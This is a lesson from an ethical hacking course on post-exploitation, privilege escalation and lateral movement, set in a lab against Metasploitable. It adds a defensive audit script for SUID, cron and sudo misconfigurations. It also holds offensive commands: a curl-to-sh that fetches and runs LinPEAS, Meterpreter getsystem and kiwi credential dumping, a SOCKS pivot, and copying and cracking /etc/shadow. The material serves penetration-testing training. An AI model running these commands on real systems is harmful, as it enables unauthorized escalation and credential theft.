Day 4 of 5
⏱ ~60 minutes
Ethical Hacking in 5 Days — Day 4

Post-Exploitation & Privilege Escalation

Getting a shell is step one. Post-exploitation determines what you can access and how far you can move through the network. Today covers privilege escalation, credential dumping, pivoting, and persistence — all documented for the final report.

Linux Privilege Escalation

A low-privilege shell is rarely enough. Look for SUID/SGID binaries, writable cron jobs, weak sudo rules, world-writable /etc/passwd, and kernel exploits. Tools like LinPEAS and Linux Smart Enumeration automate the search. GTFOBins documents how to escalate with specific binaries like find, vim, and python.
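
The same four misconfigurations can be checked from the defender's side before an attacker or a pentester finds them. The script below is an added example, not part of the course or of LinPEAS; `SUID_BASELINE` is a constructed list to tune per distribution, and the checks take a root directory so they can run against `/` on a host or against a staged tree.

```sh
#!/bin/sh
# Hypothetical defender-side audit for the Linux escalation vectors listed above.
# Each check takes a root directory, so it can run against / on a live host or
# against a staged directory tree. Assumed: run as root for full coverage
# (/etc/sudoers and some cron directories are not readable by other users).

# Constructed baseline of SUID/SGID binaries expected on a minimal install;
# tune it for your own distribution image before relying on the results.
SUID_BASELINE="/usr/bin/passwd /usr/bin/sudo /usr/bin/su /usr/bin/mount /usr/bin/umount"

# Print SUID/SGID files under $1 that are not in SUID_BASELINE, one per line.
# Anything listed here is either a local addition to review or a bit to strip.
audit_suid() {
    root="${1%/}"
    find "${root:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r f; do
        rel="${f#"$root"}"                   # path as it would appear on the host
        case " $SUID_BASELINE " in
            *" $rel "*) ;;                   # expected binary, nothing to report
            *) printf '%s\n' "$rel" ;;
        esac
    done
}

# Print world-writable entries among the files whose modification yields root:
# /etc/passwd and the system cron configuration.
audit_world_writable() {
    root="${1%/}"
    find "$root/etc/passwd" "$root/etc/crontab" "$root/etc/cron.d" \
         "$root/etc/cron.hourly" "$root/etc/cron.daily" -perm -0002 2>/dev/null |
    while IFS= read -r f; do
        printf '%s\n' "${f#"$root"}"
    done
}

# Print active sudoers rules that grant NOPASSWD, the "weak sudo rules" to review
# (comment lines are ignored; the rule text is printed verbatim).
audit_sudo_nopasswd() {
    root="${1%/}"
    cat "$root/etc/sudoers" "$root/etc/sudoers.d"/* 2>/dev/null |
        grep -E '^[^#]*NOPASSWD' || true
}

# Usage: sh escalation_audit.sh /   (no arguments: only define the functions)
if [ "$#" -gt 0 ]; then
    echo "== SUID/SGID files outside baseline"; audit_suid "$1"
    echo "== World-writable passwd/cron entries"; audit_world_writable "$1"
    echo "== sudo NOPASSWD rules"; audit_sudo_nopasswd "$1"
fi
```

Run it from a configuration-management job and diff the output against the previous run; a new line in any section is a change worth a ticket.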

Windows Privilege Escalation

On Windows, check for unquoted service paths, weak service permissions, AlwaysInstallElevated registry keys, and token impersonation opportunities. WinPEAS, PowerUp, and Seatbelt automate enumeration. Meterpreter's 'getsystem' tries multiple escalation techniques automatically.

Lateral Movement & Pivoting

Once root or SYSTEM is obtained, extract credentials (Mimikatz on Windows, /etc/shadow on Linux) and use them to move to other machines. Port-forwarding and SOCKS proxies let you reach network segments that aren't directly accessible. Document every machine you touch — scope creep is a serious professional and legal issue.

```bash
# Linux: find SUID binaries
find / -perm -u=s -type f 2>/dev/null

# Linux: check sudo permissions
sudo -l

# Run LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Windows Meterpreter privilege escalation
meterpreter> getsystem
meterpreter> load kiwi
meterpreter> creds_all

# Pivot: set up SOCKS proxy via Meterpreter
meterpreter> run auxiliary/server/socks_proxy SRVPORT=1080 VERSION=5

# Linux password hashes: copy them out, then crack the copy offline
cat /etc/shadow > shadow.txt
john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt
```
💡 Use the principle of minimum necessary access. Only escalate privileges when required by your scope. Unnecessary escalation can damage systems and violates your Rules of Engagement.

📝 Day 4 Exercise
Escalate to Root on Linux
  1. On your Metasploitable shell, run LinPEAS and save the output to a file
  2. Identify the top 3 privilege escalation vectors LinPEAS highlights
  3. Find an SUID binary using GTFOBins and escalate to root with it
  4. Extract /etc/shadow and crack at least one password with John the Ripper
  5. Document the full kill chain from initial access to root in your mock report

Day 4 Summary

  • LinPEAS and WinPEAS automate privilege escalation enumeration
  • SUID binaries, sudo misconfigs, and weak services are common Linux escalation paths
  • Mimikatz and kiwi dump Windows credentials from memory
  • Pivoting lets you reach internal network segments through a compromised host
  • Document every action — post-exploitation notes feed directly into the report

Challenge

Compromise a second machine on your lab network using credentials extracted from the first. Show the full lateral movement path in a network diagram.